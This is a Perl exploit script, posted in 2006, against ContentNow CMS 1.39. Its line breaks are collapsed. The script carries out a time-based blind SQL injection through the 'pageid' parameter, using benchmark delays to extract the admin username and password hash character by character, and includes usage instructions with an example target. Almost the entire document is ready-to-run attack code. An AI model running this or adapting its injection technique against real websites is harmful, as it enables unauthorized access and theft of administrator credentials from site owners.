contentnow_139_sqlinj.pl.txt
Posted on 22 November 2006
#!/usr/bin/perl -w use IO::Socket; use strict; # ContentNow "pageid" Sql Injection # Version : 1.39 # Url : http://www.contentnow.mf4k.de # Author : Alfredo 'revenge' Pesoli # Advisory : http://www.0xcafebabe.it/advisory/contentnow_139_sqlinjection.txt # # Description: # # The "pageid" parameter isn't properly sanitised before being returned in sql query # and can be used to inject craft SQL queries, we can use Blind SQL Injection attack # to disclose admin credential. # # Works regardless of magic quotes # # http://www.0xcafebabe.it # <revenge@0xcafebabe.it> if (@ARGV < 2) { &usage; } my $delay = "1500000"; my $host = $ARGV[0]; my $dir = $ARGV[1]; if ($ARGV[2] ) { $delay = $ARGV[2]; } print " Target url : ".$host.$dir." "; $host =~ s/(http://)//; my @array = ("user","password"); print "--== Trying to perform sql injection ==-- "; sleep(1); &sploit(); sub sploit() { my $x = ""; my $i = ""; my $string = ""; my $res = "1"; for ( $x=0; $x<=$#array; $x++ ) { my $j = 1; $res = 1; while ($res) { for ($i=32;$i<=127;$i++) { $res = 0; if ( $x eq 1 ) { next if ( $i < 48 ); next if ( ( $i > 57 ) and ( $i < 97 ) ); next if ( $i > 102 ); } my $val = "index.php?"; $val .= "pageid=(select(if((ascii(substring($array[$x],$j,1))=$i),benchmark(".$delay.",sha1(13)),0))/**/from/**/cn_sessions/**/where/**/id=1/**/limit/**/1)"; my $data=$dir.$val; my $start = time(); my $req = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Error - connection failed "; print $req "GET $data HTTP/1.1 "; print $req "Host: $host "; print $req "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 (GNU Linux) "; print $req "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 "; print $req "Accept-Language: en-us;q=0.7,en;q=0.3 "; print $req "Accept-Encoding: gzip,deflate "; print $req "Keep-Alive: 300 "; print $req "Connection: Keep-Alive "; print $req "Cache-Control: no-cache "; print $req "Connection: close "; while (my $result = <$req>) { if ( $result =~ /404 Not Found/ ) { printf " File not found. "; print " $result "; exit; } if ( $result =~ /400 Bad Request/ ) { printf " Bad request. "; print " $result "; exit; } } my $end = time(); my $dft = $end - $start; if ( $dft > 4 ) { $string .= chr($i); print " Found : ".chr($i)." "; $res = 1; last; } print " Trying : ".chr($i)." "; } $j++; if ( !$res ) { $array[$x] = $string; $string = ""; } } } print " ---------------------- "; print "Admin username : $array[0] "; print "Admin password : $array[1] "; } sub usage() { print " ContentNow CMS 1.39 'pageid' SQL Injection Exploit (Admin credentials disclosure) "; print " <revenge@0xcafebabe.it> "; print " http://www.0xcafebabe.it "; print "Usage: $0 <target> <directory> [benchmark_delay] "; print "Example: $0 127.0.0.1 /contentnow/ 2000000 "; exit(); }
